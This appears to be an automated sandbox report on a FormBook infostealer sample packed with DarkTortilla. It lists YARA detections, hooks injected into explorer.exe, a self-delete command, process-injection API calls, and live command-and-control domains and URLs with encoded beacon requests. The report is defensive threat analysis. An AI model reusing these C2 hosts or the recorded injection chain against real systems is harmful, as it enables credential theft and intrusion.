              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtEnumerateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • VT rate limit hit for: yaM8XR1HfL.exe

              Simulations

              Behavior and APIs

              TimeTypeDescription
              09:54:50API Interceptor6x Sleep call for process: yaM8XR1HfL.exe modified
              09:55:00API Interceptor652x Sleep call for process: explorer.exe modified
              09:55:36API Interceptor457235x Sleep call for process: WWAHost.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              217.160.0.1Aposporogony.exeGet hashmaliciousFormBook, GuLoaderBrowse
              • www.codemars.academy/nqhc/?r4txB=HWUkI9TTae9E16Ico4VYIxYl96Wd6gyAbZTC2FoY75Z91OR/nsTZW6u7F26sGGS3r1HZf2jS9pu5KUGpbE/+fGNm2HkM109OTw==&b6=1b9p
              Proforma Fatura Hk..exeGet hashmaliciousFormBookBrowse
              • www.costa-del-sol.email/oy10/?O6j0pt-H=Izx4t1n+Rf3Ca+hvFKJVzS7z6yqKmy5N8eBT+7/R7lCHRBcOd+zbWzFHGx7cyqFTaQhR1cgXEQ==&zJBP0b=_HshZx40LLo8FJ-p
              AWB18500182174_11355.exeGet hashmaliciousFormBookBrowse
              • www.lesmarines.online/en27/?wVU=7nW0dRrhkf&Dz=jP3mx/WBrAowWkuRRogLKNJAgIRHsPkXLr3i9dvTIbx1ZgmXy3n13YA+/GTjthircZJO
              SecuriteInfo.com.Trojan.PackedNET.1474.27528.exeGet hashmaliciousFormBookBrowse
              • www.palma-mallorca.email/o85a/?ZPwhCf=L0bOj3F+Us1Wr6G8phOr+mrYBB5K4uWQ2s3SoNHCO9Y6VdWsp6bd9OWIjIalJ1l7ZuBU&uFQh=Rh0Da8TXt
              PROFORMA INV-98876374.xlsxGet hashmaliciousFormBookBrowse
              • www.regensburg-ferienwohnung.com/n6g4/?oXEl=FdjjBPDfgPOpjR5dSaZEg+KecPu2EqbU9FY+ND8ScrQ1GAaxqnTck+f9zndzapeNPZAufw==&xfR=-ZG0UV2xhHTT9

              Domains

              No context

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              ONEANDONE-ASBrauerstrasse48DEhttps://www.asarco.com/Get hashmaliciousUnknownBrowse
              • 74.208.236.164
              Att0027592.exeGet hashmaliciousFormBookBrowse
              • 217.76.156.252
              AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
              • 217.160.0.144
              scan19062024.exeGet hashmaliciousFormBookBrowse
              • 212.227.172.254
              SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
              • 217.160.0.130
              SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
              • 217.160.0.130
              Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
              • 74.208.236.247
              Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
              • 212.227.172.254
              Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
              • 212.227.172.254
              7ZEAQv0SZ6.elfGet hashmaliciousMirai, MoobotBrowse
              • 212.227.30.65

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yaM8XR1HfL.exe.log

              Download File
              Process:C:\Users\user\Desktop\yaM8XR1HfL.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1216
              Entropy (8bit):5.34331486778365
              Encrypted:false
              SSDEEP:24:MLUE4K5E4KH1qE4x84qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHxviYHKh3oPtHo6hAHKzea
              MD5:7B709BC412BEC5C3CFD861C041DAD408
              SHA1:532EA6BB3018AE3B51E7A5788F614A6C49252BCF
              SHA-256:733765A1599E02C53826A4AE984426862AA714D8B67F889607153888D40BBD75
              SHA-512:B35CFE36A1A40123FDC8A5E7C804096FF33F070F40CBA5812B98F46857F30BA2CE6F86E1B5D20F9B6D00D6A8194B8FA36C27A0208C7886512877058872277963
              Malicious:true
              Reputation:moderate, very likely benign file
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit):7.190368995705621
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              • Win32 Executable (generic) a (10002005/4) 49.75%
              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
              • Windows Screen Saver (13104/52) 0.07%
              • Generic Win/DOS Executable (2004/3) 0.01%
              File name:yaM8XR1HfL.exe
              File size:814'080 bytes
              MD5:64a5e155baded9185ecd1fa9946c13aa
              SHA1:4e7c62d7d5b1353bfc0e0220ae89e5409201bc70
              SHA256:148da9a63f027b2e7625f0b82b42bc795737b55c46d040af508fdcea2bccad98
              SHA512:aef9499d737b198c45b1c88968bd871a85a0c16fe284f5a4477444580db158db3912db66f8a353b21a0ad727c09fcb2741e6c578c6b8d6179c089c5d59977985
              SSDEEP:12288:6+S+SFXRuTwyC6flXB3pAJFvkP5UfazdkZRavD7R5GfYG2ucIjkM:XwRuljp0v6U0SZGhGVC
              TLSH:DC05F08A17E56914E1BF77B47A74905047F3B6DBD822C24F088952EE3B73B806D817A3
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......\.........."...P..@...*......._... ...`....@.. ....................................`................................

              File Icon

              Icon Hash:cf81080c8c8e884f

              Static PE Info

              General

              Entrypoint:0x4c5f0e
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x5CEBCB17 [Mon May 27 11:33:43 2019 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

              Entrypoint Preview

              Instruction
              jmp dword ptr [00402000h]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0xc5eb80x53.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc60000x27c4.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000xc.reloc
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x20000xc3f140xc40004a12e596ab28f29d37899d16736d6481False0.7685497050382653SysEx File -7.1884613511282724IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rsrc0xc60000x27c40x28007516a9b1aac8df57844f39d6116b399cFalse0.9095703125data7.630042250772672IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .reloc0xca0000xc0x200d048457f8373a9d967e5c21369d0fda3False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0xc60e80x22e1PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9793929891365214
              RT_GROUP_ICON0xc83cc0x14data1.2
              RT_VERSION0xc83e00x3e4data0.41767068273092367

              Imports

              DLLImport
              mscoree.dll_CorExeMain

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              07/01/24-15:55:50.915978TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.5217.160.0.1

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jul 1, 2024 15:55:50.909362078 CEST4971880192.168.2.5217.160.0.1
              Jul 1, 2024 15:55:50.914287090 CEST8049718217.160.0.1192.168.2.5
              Jul 1, 2024 15:55:50.915873051 CEST4971880192.168.2.5217.160.0.1
              Jul 1, 2024 15:55:50.915977955 CEST4971880192.168.2.5217.160.0.1
              Jul 1, 2024 15:55:50.920716047 CEST8049718217.160.0.1192.168.2.5
              Jul 1, 2024 15:55:51.433768034 CEST4971880192.168.2.5217.160.0.1
              Jul 1, 2024 15:55:51.439327002 CEST8049718217.160.0.1192.168.2.5
              Jul 1, 2024 15:55:51.439853907 CEST4971880192.168.2.5217.160.0.1

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jul 1, 2024 15:55:31.463967085 CEST5015353192.168.2.51.1.1.1
              Jul 1, 2024 15:55:31.479914904 CEST53501531.1.1.1192.168.2.5
              Jul 1, 2024 15:55:50.885555029 CEST6552453192.168.2.51.1.1.1
              Jul 1, 2024 15:55:50.906372070 CEST53655241.1.1.1192.168.2.5

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jul 1, 2024 15:55:31.463967085 CEST192.168.2.51.1.1.10xd7efStandard query (0)www.osthirmaker.comA (IP address)IN (0x0001)false
              Jul 1, 2024 15:55:50.885555029 CEST192.168.2.51.1.1.10xe074Standard query (0)www.nftees.techA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jul 1, 2024 15:55:31.479914904 CEST1.1.1.1192.168.2.50xd7efName error (3)www.osthirmaker.comnonenoneA (IP address)IN (0x0001)false
              Jul 1, 2024 15:55:50.906372070 CEST1.1.1.1192.168.2.50xe074No error (0)www.nftees.tech217.160.0.1A (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • www.nftees.tech

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.549718217.160.0.1801028C:\Windows\explorer.exe
              TimestampBytes transferredDirectionData
              Jul 1, 2024 15:55:50.915977955 CEST154OUTGET /na10/?y2=vxBAV4x3qjJKkl3AB8S3aH8FdY2weIJ3+CekvXUcdu0/pCH7SUv9XlMLgROraoBr2jfW&DV=lbC06h HTTP/1.1
              Host: www.nftees.tech
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:


              Code Manipulations

              User Modules

              Hook Summary

              Function NameHook TypeActive in Processes
              PeekMessageAINLINEexplorer.exe
              PeekMessageWINLINEexplorer.exe
              GetMessageWINLINEexplorer.exe
              GetMessageAINLINEexplorer.exe

              Processes

              Process: explorer.exe, Module: user32.dll
              Function NameHook TypeNew Data
              PeekMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE1
              PeekMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE1
              GetMessageWINLINE0x48 0x8B 0xB8 0x8F 0xFE 0xE1
              GetMessageAINLINE0x48 0x8B 0xB8 0x87 0x7E 0xE1

              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:09:54:07
              Start date:01/07/2024
              Path:C:\Users\user\Desktop\yaM8XR1HfL.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\yaM8XR1HfL.exe"
              Imagebase:0xc00000
              File size:814'080 bytes
              MD5 hash:64A5E155BADED9185ECD1FA9946C13AA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2507059817.00000000053F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2494695632.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2503045630.0000000003859000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2503045630.00000000038E4000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2503045630.0000000003A0E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low
              Has exited:true

              General

              Target ID:3
              Start time:09:54:18
              Start date:01/07/2024
              Path:C:\Users\user\Desktop\yaM8XR1HfL.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\user\Desktop\yaM8XR1HfL.exe"
              Imagebase:0xc00000
              File size:814'080 bytes
              MD5 hash:64A5E155BADED9185ECD1FA9946C13AA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.2166753585.0000000000170000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:low
              Has exited:true

              General

              Target ID:4
              Start time:09:54:20
              Start date:01/07/2024
              Path:C:\Users\user\Desktop\yaM8XR1HfL.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\yaM8XR1HfL.exe"
              Imagebase:0xc00000
              File size:814'080 bytes
              MD5 hash:64A5E155BADED9185ECD1FA9946C13AA
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              General

              Target ID:7
              Start time:09:54:53
              Start date:01/07/2024
              Path:C:\Windows\explorer.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Explorer.EXE
              Imagebase:0x7ff674740000
              File size:5'141'208 bytes
              MD5 hash:662F4F92FDE3557E86D110526BB578D5
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000007.00000002.3301684101.0000000009270000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              Reputation:high
              Has exited:false

              General

              Target ID:9
              Start time:09:54:55
              Start date:01/07/2024
              Path:C:\Windows\SysWOW64\WWAHost.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\SysWOW64\WWAHost.exe"
              Imagebase:0x120000
              File size:886'080 bytes
              MD5 hash:7C7EDAD5BDA9C34FD50C3A58429C90F0
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.3293705074.0000000003590000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.3293484305.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.3293202646.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
              Reputation:moderate
              Has exited:false

              General

              Target ID:10
              Start time:09:54:59
              Start date:01/07/2024
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:/c del "C:\Users\user\Desktop\yaM8XR1HfL.exe"
              Imagebase:0x790000
              File size:236'544 bytes
              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              General

              Target ID:11
              Start time:09:54:59
              Start date:01/07/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6d64d0000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Disassembly

              Reset < >

                Execution Graph

                Execution Coverage:17.6%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:13.7%
                Total number of Nodes:117
                Total number of Limit Nodes:8
                execution_graph 65470 76881b8 65471 7688200 WriteProcessMemory 65470->65471 65473 7688257 65471->65473 65345 5c31450 65349 5c31480 65345->65349 65353 5c31470 65345->65353 65346 5c3146a 65350 5c314c2 65349->65350 65352 5c314c9 65349->65352 65351 5c3151a CallWindowProcW 65350->65351 65350->65352 65351->65352 65352->65346 65354 5c31473 65353->65354 65355 5c3151a CallWindowProcW 65354->65355 65356 5c314c9 65354->65356 65355->65356 65356->65346 65392 7cd2708 65393 7cd273a 65392->65393 65397 7cd952f 65393->65397 65401 7cd9540 65393->65401 65394 7cd7dd9 65398 7cd9571 65397->65398 65405 7cd97d0 65398->65405 65399 7cd9629 65399->65394 65402 7cd9571 65401->65402 65404 7cd97d0 DeleteFileW 65402->65404 65403 7cd9629 65403->65394 65404->65403 65406 7cd97e4 65405->65406 65409 7cd9b70 65406->65409 65410 7cd9b93 65409->65410 65413 7cd1054 65410->65413 65414 7cda010 DeleteFileW 65413->65414 65416 7cd9ada 65414->65416 65416->65399 65489 7568721 65490 75686c6 VirtualProtect 65489->65490 65492 756872a 65489->65492 65491 75686f2 65490->65491 65357 7687770 65358 76877b5 Wow64GetThreadContext 65357->65358 65360 76877fd 65358->65360 65361 7687e40 65362 7687e80 VirtualAllocEx 65361->65362 65364 7687ebd 65362->65364 65365 7680040 65366 7680067 65365->65366 65367 76800af 65366->65367 65369 7680fda 65366->65369 65370 768101b 65369->65370 65371 768144c 65370->65371 65374 768396a 65370->65374 65379 76839c0 65370->65379 65371->65366 65375 76839e7 65374->65375 65376 7683ba4 65375->65376 65384 7685ca0 65375->65384 65388 7685c95 65375->65388 65376->65370 65381 76839e7 65379->65381 65380 7683ba4 65380->65370 65381->65380 65382 7685ca0 CreateProcessAsUserW 65381->65382 65383 7685c95 CreateProcessAsUserW 65381->65383 65382->65381 65383->65381 65385 7685d1f CreateProcessAsUserW 65384->65385 65387 7685e20 65385->65387 65387->65387 65389 7685ca1 CreateProcessAsUserW 65388->65389 65391 7685e20 65389->65391 65417 756769e 65427 75676ac 65417->65427 65418 7567729 65427->65418 65428 721ecc4 65427->65428 65433 721e592 65427->65433 65437 721e472 65427->65437 65441 721dba3 65427->65441 65445 721e843 65427->65445 65449 721dc70 65427->65449 65454 721dcff 65427->65454 65458 721dc2c 65427->65458 65429 721eccd 65428->65429 65462 756e700 65429->65462 65467 756e708 65429->65467 65430 721ecdf 65435 756e700 VirtualProtect 65433->65435 65436 756e708 VirtualProtect 65433->65436 65434 721e5a6 65435->65434 65436->65434 65439 756e700 VirtualProtect 65437->65439 65440 756e708 VirtualProtect 65437->65440 65438 721e483 65439->65438 65440->65438 65443 756e700 VirtualProtect 65441->65443 65444 756e708 VirtualProtect 65441->65444 65442 721db07 65442->65427 65443->65442 65444->65442 65447 756e700 VirtualProtect 65445->65447 65448 756e708 VirtualProtect 65445->65448 65446 721e856 65447->65446 65448->65446 65450 721dc2d 65449->65450 65451 721dc3d 65450->65451 65452 756e700 VirtualProtect 65450->65452 65453 756e708 VirtualProtect 65450->65453 65452->65451 65453->65451 65456 756e700 VirtualProtect 65454->65456 65457 756e708 VirtualProtect 65454->65457 65455 721dd13 65456->65455 